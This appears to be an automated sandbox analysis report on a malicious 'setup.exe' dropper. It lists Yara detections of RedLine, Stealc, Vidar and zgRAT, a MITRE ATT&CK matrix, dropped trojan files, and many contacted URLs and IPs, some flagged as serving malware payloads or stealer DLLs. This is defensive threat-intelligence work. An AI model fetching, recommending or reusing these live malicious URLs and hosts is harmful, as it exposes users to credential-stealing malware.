Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d7f760.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d7f760.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d1e060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2446122918.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2396195188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.4Q6k8SlqG7M24bYO3UgMWICf.exe.73ab00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.4Q6k8SlqG7M24bYO3UgMWICf.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.4Q6k8SlqG7M24bYO3UgMWICf.exe.73ab00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2550868156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2414041774.000000000073A000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000009.00000002.2627954517.0000000001CF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lbg6Jgx2PuK0JimgGIFCI5UU.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.4314a88.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.4314a88.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Lbg6Jgx2PuK0JimgGIFCI5UU.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.437bed8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.437bed8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2606301405.0000000000A01000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2451450016.0000000004314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2806277052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2421723577.000000000338B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2451450016.000000000437B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2451450016.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2451450016.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lbg6Jgx2PuK0JimgGIFCI5UU.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yHP2Z5SFUIZjI8pAKB_H3QUP.exe PID: 2876, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	51 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	11 Windows Service	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credential API Hooking	3 File and Directory Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Bypass User Account Control	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	169 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	1 Access Token Manipulation	3 Obfuscated Files or Information	NTDS	871 Security Software Discovery	Distributed Component Object Model	1 Credential API Hooking	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	Network Logon Script	11 Windows Service	22 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	311 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	581 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 Bypass User Account Control	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	21 Registry Run Keys / Startup Folder	11 Masquerading	Proc Filesystem	2 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	581 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1719859269.0326595_setup.exe	18%	ReversingLabs
1719859269.0326595_setup.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe	100%	Avira	HEUR/AGEN.1315075
C:\ProgramData\FCBFBGDBKJ.exe	100%	Avira	HEUR/AGEN.1317026
C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	100%	Joe Sandbox ML
C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe	100%	Joe Sandbox ML
C:\ProgramData\FCBFBGDBKJ.exe	100%	Joe Sandbox ML
C:\ProgramData\FCBFBGDBKJ.exe	68%	ReversingLabs	Win32.Trojan.Znyonm
C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	62%	ReversingLabs	Win32.Trojan.Leonem
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe	92%	ReversingLabs	Win64.Trojan.Privateloader
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	62%	ReversingLabs	Win32.Trojan.Leonem
C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5OpenGL.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5Svg.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5WinExtras.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\Qt5Xml.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\QtAVWidgets1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\avdevice-58.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-07TP8.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-0K04O.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-18MLT.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-4H4R9.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-9A6KK.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-B37O4.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-IK2RF.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-JR9V0.tmp	83%	ReversingLabs	Win32.PUA.IcLoader
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-LRHSQ.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-NPF14.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-O6M3F.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-P12J5.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-QM7CF.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-RPUL3.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-TJFT6.tmp	3%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-VCOE9.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\libcurl.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\libeay32.dll (copy)	83%	ReversingLabs	Win32.PUA.IcLoader
C:\Users\user\AppData\Local\MP3Doctor Free 2020\libmp3lame.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\mousehelper.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp120.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp140.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcp140_1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\msvcr120.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\openh264.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\MP3Doctor Free 2020\unins000.exe (copy)	3%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlt[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\123p[1].exe	92%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe	54%	ReversingLabs	Win32.Trojan.Leonem
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\super[1].exe	46%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lumma2806[1].exe	68%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	39%	ReversingLabs	Win32.Adware.Generic
C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe	62%	ReversingLabs	Win32.Trojan.Leonem
C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_RegDLL.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_iscrypt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	62%	ReversingLabs	Win32.Trojan.RedLineSteal
C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	37%	ReversingLabs	Win32.Infostealer.Generic
C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	62%	ReversingLabs	Win32.Trojan.Leonem
C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	46%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	92%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	54%	ReversingLabs	Win32.Trojan.Leonem

Source	Detection	Scanner	Label
http://www.innosetup.com/	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
77.105.135.107:3445	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll	0%	Avira URL Cloud	safe
https://bitbucket.org:80/sdgdf/fbghhj/downloads/streamer.exem	0%	Avira URL Cloud	safe
https://download.wondershare.net/cbs_down/filmora-idco_full1901.exe	0%	Avira URL Cloud	safe
https://vk.com/doc461844031_680356434?hash=KmXLjZzwyKBjmzxff0Jo9U1YwRL71yZftAbVL5kdyKD&dl=3v6LT2A7IS	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	0%	Avira URL Cloud	safe
https://papi.vk.com/pushsse/ruim	0%	Avira URL Cloud	safe
https://jira.adguard.com/browse/AG-7046	0%	Avira URL Cloud	safe
https://vk.com:80/doc851967711_678965991?hash=15v5bIC0BdxsDWrpl71N2Lf9ztIhZN508DquMzIAGCz&dl=yDzL4lh	0%	Avira URL Cloud	safe
https://sun6-23.userapi.com/	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/sqlite3.dll#	100%	Avira URL Cloud	malware
http://80.78.242.100/d/525403pD	0%	Avira URL Cloud	safe
https://jira.adguard.com/browse/AG-20455	0%	Avira URL Cloud	safe
https://st6-21.vk.com/css/al/base.ec2ae8ae.css	0%	Avira URL Cloud	safe
https://bitbucket.org:80/sdgdf/fbghhj/downloads/streamer.exeV	0%	Avira URL Cloud	safe
https://vk.com	0%	Avira URL Cloud	safe
https://jira.adguard.com/browse/AG-20454	0%	Avira URL Cloud	safe
https://www.instagram.com	0%	Avira URL Cloud	safe
http://download.wondershare.net/cbs_down/filmora-idco_64bit_full1901.exe	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/softokn3.dll	100%	Avira URL Cloud	malware
http://pop.wondershare.com/filmora-licen	0%	Avira URL Cloud	safe
https://aui-cdn.atlassian.com/	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/mozglue.dll	100%	Avira URL Cloud	malware
http://80.78.242.100/d/525403com	0%	Avira URL Cloud	safe
https://a.884736279.xyz/385137/setup.exe	0%	Avira URL Cloud	safe
http://helsinki-dtc.com/updates/yd/wrtzr_yt_a_1/win/version.txt?ZOmFPgPUTVZNbWpVqvSvPLQtsthTrEhbx	100%	Avira URL Cloud	malware
http://77.105.133.27/download/123p.exey	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/freebl3.dllq	100%	Avira URL Cloud	malware
https://bbuseruploads.s3.amazonaws.com/FPj	0%	Avira URL Cloud	safe
https://filmora.w	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://helsinki-dtc.com/updates/yd/yt_wrtzr_1/win/version.txt?BaGHTJrEOqpSoOUUbPmVVgUlkCFxoVbnT	100%	Avira URL Cloud	malware
http://77.91.77.81/mine/amadka.exe00	100%	Avira URL Cloud	phishing
https://sun6-22.userapi.com/	0%	Avira URL Cloud	safe
https://jira.adguard.com/browse/AG-20454G	0%	Avira URL Cloud	safe
https://vk.com/doc851967711_678965991?hash=15v5bIC0BdxsDWrpl71N2Lf9ztIhZN508DquMzIAGCz&dl=yDzL4lhSc6Qh08VS3lx8KlKwYrkSiYGlwvhnSbB1cMD&api=1&no_preview=1#1	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.rapidfilestorage.com/clrls/cl_rls.json	100%	Avira URL Cloud	malware
https://stats.vk-portal.net	0%	Avira URL Cloud	safe
https://sun6-21.userapi.com/c235031/u851967711/docs/d19/e642d2d3ea8a/File.bmp?extra=codZE4oOkF_mb0aHMW2_KJkLotDgGHzpcd-JeGF88YLnbk2Qm4WcZoXVvzJ1HuH2HaOhqgSp6_uV0Z6TCfxUYwreX5Rq2H_XmfQYz82S4_LBrsYcRulTXC2HKGtLY-ovV1tbmUk3ivmp	0%	Avira URL Cloud	safe
https://sun6-22.userapi.com/%r	0%	Avira URL Cloud	safe
http://80.78.242.100/d/525403	0%	Avira URL Cloud	safe
http://www.winimage.com/zLibDllm_object	0%	Avira URL Cloud	safe
https://vk.com/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfeEiGdn2IU9JTEdwqaRFTDnZMFQJn7v9z&api=1&no_preview=1#ww11	0%	Avira URL Cloud	safe
https://cdn.cookielaw.org/	0%	Avira URL Cloud	safe
https://r.mradx.net	0%	Avira URL Cloud	safe
https://vk.com/doc851967711_678909859?hash=lNew8DPFlC3FkyFwDvSRD3AUel2qUbt8XwQ47izbny0&dl=VoWAeLPwa3VHUZ6RGMrmgXoJxs6sK0ufCNL8HdLsSa4&api=1&no_preview=1#xin	0%	Avira URL Cloud	safe
http://www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt?lkNOHJiXnxKRAffVlKrZwoIEmkviEhCxR	100%	Avira URL Cloud	malware
https://a.884736279.xyz/	0%	Avira URL Cloud	safe
https://static.vk.me	0%	Avira URL Cloud	safe
https://vk.com/oot%	0%	Avira URL Cloud	safe
http://77.91.77.81/cost/go.exeAppData	100%	Avira URL Cloud	phishing
http://www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt?BAxskCrAzBkAQLhyBAyQiyrSwfaJVtVcO	100%	Avira URL Cloud	malware
http://77.91.77.81/cost/go.exe	100%	Avira URL Cloud	phishing
https://jira.adguard.com/browse/AG-20455N	0%	Avira URL Cloud	safe
https://st6-21.vk.com/dist/web/polyfills.isolated.70196a4e.js	0%	Avira URL Cloud	safe
https://vk.com:80/doc851967711_678909859?hash=lNew8DPFlC3FkyFwDvSRD3AUel2qUbt8XwQ47izbny0&dl=VoWAeLP	0%	Avira URL Cloud	safe
https://cdn.discordapp.com/attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67&	0%	Avira URL Cloud	safe
https://vk.com:80/doc461844031_680356434?hash=KmXLjZzwyKBjmzxff0Jo9U1YwRL71yZftAbVL5kdyKD&dl=3v6LT2A	0%	Avira URL Cloud	safe
https://monoblocked.com/	0%	Avira URL Cloud	safe
https://cdn.discordapp.com/	0%	Avira URL Cloud	safe
https://cdn.ampproject.org	0%	Avira URL Cloud	safe
https://st6-21.vk.com	0%	Avira URL Cloud	safe
https://jira.int.agrd.dev/browse/AG-32263	0%	Avira URL Cloud	safe
https://sun6-22.userapi.com/c235031/u851967711/docs/d58/101acf609709/crypted.bmp?extra=Ux3hmN1iPre6d	0%	Avira URL Cloud	safe
http://77.105.133.27/download/th/space.php	100%	Avira URL Cloud	malware
https://login.vk.com/?act=logout&hash=a280e68e075c926b49&_origin=https%3A%2F%2Fvk.com&lrt=BDpxh3TFcr	0%	Avira URL Cloud	safe
http://77.105.133.27/download/123p.exe	100%	Avira URL Cloud	malware
https://bitbucket.org/m/v	0%	Avira URL Cloud	safe
https://monoblocked.com/385137/setup.exeom/	0%	Avira URL Cloud	safe
https://vk.com/zD	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/nss3.dll	100%	Avira URL Cloud	malware
https://monoblocked.com/385137/setup.exexe	0%	Avira URL Cloud	safe
https://dev.vk.com	0%	Avira URL Cloud	safe
https://cdn.syndication.twimg.com	0%	Avira URL Cloud	safe
https://www.wondershare.com/privacy.html	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll	100%	Avira URL Cloud	malware
https://vk.com/doc461844031_680356434?hash=KmXLjZzwyKBjmzxff0Jo9U1YwRL71yZftAbVL5kdyKD&dl=3v6LT2A7IS0PX4HrE4vRkDm0d4mbocnTvyEbLzKxGUP&api=1&no_preview=1#def_meta	0%	Avira URL Cloud	safe
https://securepubads.g.doubleclick.net	0%	Avira URL Cloud	safe
https://www.wondershare.com/company/end-user-license-agreement.html	0%	Avira URL Cloud	safe
http://85.28.47.4/69934896f997d5bb/freebl3.dll	100%	Avira URL Cloud	malware
http://85.28.47.4/920475a59bac849d.php	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://vk.ru	0%	Avira URL Cloud	safe
https://api.myip.com/	0%	Avira URL Cloud	safe
https://jira.adguard.com/browse/AG-18203.	0%	Avira URL Cloud	safe
https://web-security-reports.services.atlassian.com/csp-report/bb-website	0%	Avira URL Cloud	safe
http://api2.check-data.xyz/api2/google_api_ifi	100%	Avira URL Cloud	malware
http://85.28.47.4/69934896f997d5bb/sqlite3.dll	100%	Avira URL Cloud	malware
http://77.91.77.81/mine/amadka.exew$	100%	Avira URL Cloud	phishing
https://sun6-23.userapi.com/zD	0%	Avira URL Cloud	safe
https://d136azpfpnge1l.cloudfront.net/;	0%	Avira URL Cloud	safe
https://bitbucket.org/sdgdf/fbghhj/downloads/streamer.exeal	0%	Avira URL Cloud	safe
https://jira.adguard.com/browse/AG-159168	0%	Avira URL Cloud	safe
https://st6-21.vk.com/css/fonts/VKSansDisplayDemiBoldFaux.v100.woff2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
a.884736279.xyz	79.174.95.43	true	true	unknown
bitbucket.org	104.192.141.1	true	false	unknown
tea.arpdabl.org	207.180.253.128	true	false	unknown
env-3936544.jcloud.kz	185.22.66.16	true	false	unknown
monoblocked.com	45.130.41.108	true	false	unknown
d1u0l9f6kr1di3.cloudfront.net	13.225.78.36	true	false	unknown
helsinki-dtc.com	194.67.87.38	true	false	unknown
t.me	149.154.167.99	true	true	unknown
lop.foxesjoy.com	188.114.96.3	true	false	unknown
cdn.discordapp.com	162.159.133.233	true	false	unknown
sun6-21.userapi.com	95.142.206.1	true	false	unknown
iplogger.org	172.67.132.113	true	false	unknown
pool.hashvault.pro	142.202.242.45	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
s3-w.us-east-1.amazonaws.com	3.5.20.219	true	false	unknown
api.myip.com	104.26.9.59	true	false	unknown
potterryisiw.shop	188.114.97.3	true	false	unknown
ipinfo.io	34.117.186.192	true	false	unknown
sun6-22.userapi.com	95.142.206.2	true	false	unknown
service-domain.xyz	54.210.117.250	true	true	unknown
sun6-23.userapi.com	95.142.206.3	true	false	unknown
googlehosted.l.googleusercontent.com	142.250.181.225	true	false	unknown
checkdata-1114476139.us-west-2.elb.amazonaws.com	44.240.96.128	true	false	unknown
vk.com	87.240.132.78	true	false	unknown
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	unknown
www.rapidfilestorage.com	unknown	unknown	false	unknown
clients2.googleusercontent.com	unknown	unknown	false	unknown
ellaboratepwsz.xyz	unknown	unknown	true	unknown
api2.check-data.xyz	unknown	unknown	true	unknown
skrptfiles.tracemonitors.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
77.105.135.107:3445	true	Avira URL Cloud: safe	unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll	true	Avira URL Cloud: malware	unknown
https://a.884736279.xyz/385137/setup.exe	false	Avira URL Cloud: safe	unknown
http://helsinki-dtc.com/updates/yd/wrtzr_yt_a_1/win/version.txt?ZOmFPgPUTVZNbWpVqvSvPLQtsthTrEhbx	false	Avira URL Cloud: malware	unknown
